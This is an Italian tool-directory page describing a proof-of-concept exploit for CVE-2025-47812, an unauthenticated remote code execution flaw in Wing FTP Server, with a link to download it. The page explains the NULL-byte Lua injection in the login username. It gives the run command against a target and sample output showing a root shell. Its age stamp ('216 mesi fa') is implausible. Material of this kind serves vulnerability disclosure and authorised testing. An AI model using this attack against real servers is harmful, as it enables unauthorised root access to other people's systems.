Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-47812-Wing-FTP-Server-7.4.3-Unauthenticated-RCE-PoC — Exploit proof-of-concept per CVE-2025-47812: esecuzione remota di codice non autenticata in Wing FTP Server <= 7.4.3 tramite iniezione di byte nulli nel parametro username, fornendo accesso root/SYSTEM. | Kitploit
Strumenti/GitHubGitHub/estebanzarate/cve-2025-47812-wing-ftp-server-7.4.3-unauthenticated-rce-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso RemotoSviluppo Payload
GitHubestebanzarate/cve-2025-47812-wing-ftp-server-7.4.3-unauthenticated-rce-poc

CVE-2025-47812-Wing-FTP-Server-7.4.3-Unauthenticated-RCE-PoC

Exploit proof-of-concept per CVE-2025-47812: esecuzione remota di codice non autenticata in Wing FTP Server <= 7.4.3 tramite iniezione di byte nulli nel parametro username, fornendo accesso root/SYSTEM.

Vedi Repository
216 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-47812 — Wing FTP Server <= 7.4.3 Esecuzione di codice remoto non autenticata (PoC)

Vulnerabilità di esecuzione di codice remoto non autenticata in Wing FTP Server <= 7.4.3. Un byte NULL iniettato nel parametro username durante il login causa la scrittura di codice Lua nel file di sessione. Quando si accede a /dir.html con il cookie di sessione risultante, il codice iniettato viene eseguito — come root su Linux o SYSTEM su Windows.


Come funziona

  1. Una richiesta POST modificata a /loginok.html inietta un byte NULL seguito da codice Lua nel campo username.
  2. Il server crea un file di sessione contenente il nome utente non sanificato (incluso il payload Lua).
  3. Una richiesta GET a /dir.html con il cookie UID restituito attiva l'esecuzione del codice Lua iniettato.
  4. Lo script effettua il logout tra i comandi per evitare di raggiungere il limite di sessioni concorrenti del server.

Requisiti

  • Python 3
  • Installa le dipendenze:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

Utilizzo

root@kitploit:~
python3 exploit.py -u http://TARGET

Esempio:

root@kitploit:~
$ python3 exploit.py -u http://10.10.10.10
[*] Targeting http://10.10.10.10
[*] Logging in with injected payload...
[*] Triggering payload...
[+] Target is vulnerable! Command output:
uid=0(root) gid=0(root) groups=0(root)

[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> whoami
root

Riferimenti

  • CVE-2025-47812
  • Rilascio di Wing FTP Server 7.4.4 (correzione)
  • PoC originale di 4m3rr0r

Crediti

  • Scoperta ed exploit originale: Sheikh Mohammad Hasan alias 4m3rr0r
  • Pulizia e semplificazione: Esteban Zárate
Scarica lo strumento